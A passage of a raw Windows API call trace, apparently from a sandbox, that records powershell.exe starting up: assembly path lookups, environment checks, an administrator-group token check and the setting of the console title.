out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0097.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0097.180] CoTaskMemAlloc (cb=0x104) returned 0x2920e0 [0097.180] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2920e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.180] CoTaskMemFree (pv=0x2920e0) [0097.182] CoTaskMemAlloc (cb=0x104) returned 0x2920e0 [0097.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2920e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.182] CoTaskMemFree (pv=0x2920e0) [0097.239] CoTaskMemAlloc (cb=0x104) returned 0x2920e0 [0097.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2920e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.239] CoTaskMemFree (pv=0x2920e0) [0097.241] CoTaskMemAlloc (cb=0x104) returned 0x2920e0 [0097.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2920e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.241] CoTaskMemFree (pv=0x2920e0) [0097.242] CoTaskMemAlloc (cb=0x104) returned 0x2920e0 [0097.242] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2920e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.242] CoTaskMemFree (pv=0x2920e0) [0097.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0097.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0097.461] CoTaskMemAlloc (cb=0x104) returned 0x24bb10 [0097.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24bb10, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.461] CoTaskMemFree (pv=0x24bb10) [0097.464] CoTaskMemAlloc (cb=0x104) returned 0x24bb10 [0097.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24bb10, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.465] CoTaskMemFree (pv=0x24bb10) [0097.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0097.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0097.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0097.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0098.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0098.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0098.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0098.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0098.595] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0098.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0098.596] CoTaskMemFree (pv=0x2af370) [0098.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x10d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0098.674] SetErrorMode (uMode=0x1) returned 0x1 [0098.674] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x10d960 | out: lpFileInformation=0x10d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0098.674] SetErrorMode (uMode=0x1) returned 0x1 [0098.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.905] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0098.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0098.906] CoTaskMemFree (pv=0x2af370) [0098.909] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0098.909] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0098.909] CoTaskMemFree (pv=0x2af370) [0098.910] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0098.910] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0098.910] CoTaskMemFree (pv=0x2af370) [0098.913] CoCreateGuid (in: pguid=0x10dd28 | out: pguid=0x10dd28*(Data1=0xd42aeeb8, Data2=0x24b9, Data3=0x4b1f, Data4=([0]=0x83, [1]=0x46, [2]=0x40, [3]=0x8c, [4]=0x68, [5]=0x78, [6]=0xe6, [7]=0xe1))) returned 0x0 [0098.917] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0098.917] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0098.917] CoTaskMemFree (pv=0x2af370) [0098.921] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0098.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0098.921] CoTaskMemFree (pv=0x2af370) [0098.924] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0098.924] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0098.924] CoTaskMemFree (pv=0x2af370) [0098.932] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0098.934] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x10d9d0 | out: lpConsoleScreenBufferInfo=0x10d9d0) returned 1 [0098.942] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0098.943] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x10d9d0 | out: lpConsoleScreenBufferInfo=0x10d9d0) returned 1 [0098.944] GetVersionExW (in: lpVersionInformation=0x10d960*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10d960*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0098.948] GetCurrentProcess () returned 0xffffffffffffffff [0098.949] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x10d9f8 | out: TokenHandle=0x10d9f8*=0x32c) returned 1 [0098.953] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10d918 | out: TokenInformation=0x0, ReturnLength=0x10d918) returned 0 [0098.955] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x20a7e0 [0098.955] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x8, TokenInformation=0x20a7e0, TokenInformationLength=0x4, ReturnLength=0x10d918 | out: TokenInformation=0x20a7e0, ReturnLength=0x10d918) returned 1 [0098.956] DuplicateTokenEx (in: hExistingToken=0x32c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x10da78 | out: phNewToken=0x10da78*=0x328) returned 1 [0098.956] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10d918 | out: TokenInformation=0x0, ReturnLength=0x10d918) returned 0 [0098.956] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x20a810 [0098.957] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x8, TokenInformation=0x20a810, TokenInformationLength=0x4, ReturnLength=0x10d918 | out: TokenInformation=0x20a810, ReturnLength=0x10d918) returned 1 [0098.957] CheckTokenMembership (in: TokenHandle=0x328, SidToCheck=0x2f00548*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x10da88 | out: IsMember=0x10da88) returned 1 [0098.958] CloseHandle (hObject=0x328) returned 1 [0098.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0098.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.019] CoTaskMemAlloc (cb=0x804) returned 0x1b9a0080 [0099.019] GetConsoleTitleW (in: lpConsoleTitle=0x1b9a0080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0099.020] CoTaskMemFree (pv=0x1b9a0080) [0099.054] CoTaskMemAlloc (cb=0x804) returned 0x1b9a0930 [0099.054] GetConsoleTitleW (in: lpConsoleTitle=0x1b9a0930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0099.054] CoTaskMemFree (pv=0x1b9a0930) [0099.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.057] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0099.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0099.125] GetFullPathNameW (in: 